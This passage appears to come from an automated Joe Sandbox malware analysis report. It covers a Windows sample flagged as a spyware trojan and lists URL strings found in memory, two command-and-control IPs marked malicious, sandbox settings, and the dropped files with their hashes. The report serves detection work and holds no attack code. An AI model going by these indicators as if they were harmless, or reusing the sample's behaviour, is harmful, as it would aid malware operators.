                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id8GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Entity/Id5GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id4GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id7GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id6GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                              		high
                                              https://support.google.com/chrome/?p=plugin_realGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id19ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultlGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.interoperabilitybridges.com/wmp-extension-for-chromeGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://support.google.com/chrome/?p=plugin_pdfGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id15ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://forms.real.com/real/realone/download.html?type=rpsp_usGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://support.aGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id6ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://api.ip.sb/ipGR8jRQeRUr.exe, 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeGR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://support.google.com/chrome/?p=plugin_quicktimeGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/scGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id9ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591029105.000000001E96F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590648971.000000001E7EA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590799521.000000001E8AE000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591267383.000000001EAB0000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591318944.000000001EAFB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583560791.000000001F89D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583621640.000000001F90F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591722392.000000001F7DA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583684692.000000001F980000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591648322.000000001F769000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id20GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://tempuri.org/Entity/Id21GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://tempuri.org/Entity/Id22GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://tempuri.org/Entity/Id23GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://nsis.sf.net/NSIS_ErrorErrorGR8jRQeRUr.exefalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Entity/Id24GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://tempuri.org/Entity/Id24ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://tempuri.org/Entity/Id1ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.google.com/chrome/?p=plugin_shockwaveGR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://forms.reaGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tempuri.org/Entity/Id10GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id11GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id12GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id16ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id13GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id14GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id15GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id16GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/NonceGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id17GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id18GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id5ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id19GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://tempuri.org/Entity/Id10ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RenewGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/Entity/Id8ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://support.google.com/chrome/?p=plugin_wmpGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://support.google.com/chrome/answer/6258784GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                185.112.83.8
                                                                                                                                                		unknownRussian Federation
                                                                                                                                                		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                194.26.229.202
                                                                                                                                                		unknownNetherlands
                                                                                                                                                		1213HEANETIEtrue

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                Analysis ID:541930
                                                                                                                                                Start date:18.12.2021
                                                                                                                                                Start time:08:24:06
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 8m 49s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:GR8jRQeRUr (renamed file extension from none to exe)
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Number of analysed new started processes analysed:25
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@3/4@0/2
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 28.7% (good quality ratio 28.1%)
                                                                                                                                                • Quality average: 88.4%
                                                                                                                                                • Quality standard deviation: 21%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 85%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.54.113.104
                                                                                                                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                08:27:20API Interceptor17x Sleep call for process: GR8jRQeRUr.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                No context

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                No context

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GR8jRQeRUr.exe.log
                                                                                                                                                Process:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2291
                                                                                                                                                Entropy (8bit):5.3192079301865585
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:MIHKmfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHK1HxLHG1qHqH5HX:Pqaq5qXAqLqdqUqzcGYqhQnoPtIxHbqG
                                                                                                                                                MD5:2308F672881D77B53310A221B4D27E95
                                                                                                                                                SHA1:80371C7B5D415DC46F2BB4BA872B14AF0B0EED8B
                                                                                                                                                SHA-256:83D6F5E305A78D3EAB05CFB58D8595FECB2755E80978C6D6236AEF9186E65CDB
                                                                                                                                                SHA-512:ECFBCDFAA24CEE02DFAD3175043FF4408F100E0867A66AE3AF14C2C7CB572E451C052A4D5FA452F6FB5C732C082DA7AB321F58CF65E37862E777EEF4DADDC652
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b
                                                                                                                                                C:\Users\user\AppData\Local\Temp\a.txt
                                                                                                                                                Process:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):23
                                                                                                                                                Entropy (8bit):2.2068570640942187
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:jNDBfN:jNVfN
                                                                                                                                                MD5:6C3AA179406696C66ACF8DC984ABC7DF
                                                                                                                                                SHA1:7F66AB35CA41A3449382F9DA68864D64EC182F28
                                                                                                                                                SHA-256:798DF5B3298985AE022F8C5A6714F7891EAA49B2E4B24E3A8B2329C04DD11C71
                                                                                                                                                SHA-512:7551B1FBE1CAEF52FD0AFC8601DCD0D6F013198FCC7CBF57F42EB090577B34B91E6F4ADCE1A76BC7FFD95559A3FDD529FE6DE90B8335EF8E901CBB606DDAE836
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: ghdfhjfghfgjfdghfghfgdh
                                                                                                                                                C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll
                                                                                                                                                Process:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12288
                                                                                                                                                Entropy (8bit):5.814115788739565
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
